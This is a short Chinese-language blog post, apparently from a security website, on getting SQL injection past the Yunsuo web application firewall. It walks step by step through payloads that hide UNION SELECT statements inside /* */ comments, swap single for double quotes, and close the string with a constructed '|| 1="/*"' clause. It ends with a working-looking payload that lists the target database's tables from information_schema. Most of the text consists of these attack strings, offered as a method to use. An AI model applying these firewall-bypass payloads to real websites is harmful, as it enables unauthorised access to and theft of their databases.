前言
绕过云锁的朋友都只要云锁对注释的内容不会继续过滤,那么可以通过这个思路,把我们的SQL语句放到/**/里面,并且要让他执行我们的SQL语句,但是/*!50006*/类似这样是不可以的,因为这种云锁会进行检测
Bypass
我们先直接输入危险字符
payload:' union select 1,2,3-- a

然后用/**/包裹SQL语句
payload:/*' union select 1,2,3*/-- a

发现是可以成功绕过的,但是SQL语句并没有执行,那么可以让前面的/*变成一个字符然后把*/放到注释那里就可以让我们的SQL语句执行了
payload:/*' union select 1,2,3-- */

竟然被拦截了,最后经过测试发现只要有'一般都会拦截,当然也不是绝对的,最后把'换成"这个成功绕过
payload:/*" union select 1,2,3-- */

但是有个问题出现了,就是没有成功闭合,但是我们可以自己构造一个"来闭合啊
payload:' || 1="/*" union select 1,2,3-- */

成功绕过,执行其他sql语句
payload:' || 1="/*" union select 1,table_name,3 from information_schema.tables where table_schema=database()-- */

本站文章除注明转载/出处外,均为本站原创或翻译,如若转载,请注明出处。